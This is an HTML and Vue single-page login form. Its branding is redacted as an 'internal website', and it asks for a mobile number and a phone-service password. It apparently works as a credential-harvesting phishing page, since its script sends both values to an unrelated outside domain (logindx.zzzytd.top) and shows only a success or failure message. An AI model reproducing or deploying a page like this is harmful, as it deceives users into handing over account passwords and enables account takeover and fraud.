<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>XXXXX内部网站登录</title>
    <!-- 引入 Element Plus 样式文件 -->
    <link rel="stylesheet" href="css/reset.css">
    <link rel="stylesheet" href="css/index.css">
    <style lang="scss">
        .login-container {
            text-align: center;
            margin: 0 auto;
            width: 400px;
            padding: 20px;
            background-color: #f5f7fa;
            border: 1px solid #dcdfe6;
            border-radius: 5px;
            box-shadow: 0 2px 12px 0 rgba(0, 0, 0, 0.1);
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);

        }

        .el-form-item__content button {
            width: 100%;
        }

        .el-form-item label {
            width: 80px;
        }
    </style>
</head>

<body>
    <div id="app" class="login-container">
        <el-container>
            <el-header>
                <h1>XXXXXXXX登录</h1>
            </el-header>
            <el-main>
                <el-form @submit.native.prevent="login">
                    <el-form-item label="手机号" prop="tel">
                        <el-input v-model="tel" required></el-input>
                    </el-form-item>
                    <el-form-item label="服务密码" prop="passwd">
                        <el-input type="password" v-model="passwd" required></el-input>
                    </el-form-item>
                    <el-form-item>
                        <el-button type="primary" native-type="submit">登录</el-button>
                    </el-form-item>
                </el-form>
            </el-main>
        </el-container>
    </div>

    <script src="js/vue.global.prod.js"></script>
    <script src="js/index.full.min.js"></script>
    <script src="js/axios.min.js"></script>
    <script>
        const { ref } = Vue;
        const { ElMessage } = ElementPlus;
        const app = Vue.createApp({
            setup() {
                const tel = ref('');
                const passwd = ref('');

                const login = () => {
                    // 发送口令到后端进行验证
                    axios.post('https://logindx.zzzytd.top/test01/login', { tel: tel._value, passwd: passwd._value })
                        .then(response => {
                            console.log(response);
                            if (response.data == '200') {
                                //登录成功
                                ElMessage.success('登录成功');
                            } else {
                                //登录失败
                                ElMessage.error('登录失败:' + response.data);
                            }
                        })
                }


                return {
                    tel,
                    passwd,
                    login
                };
            }
        });
        app.use(ElementPlus);
        app.mount('#app');
    </script>
</body>

</html>
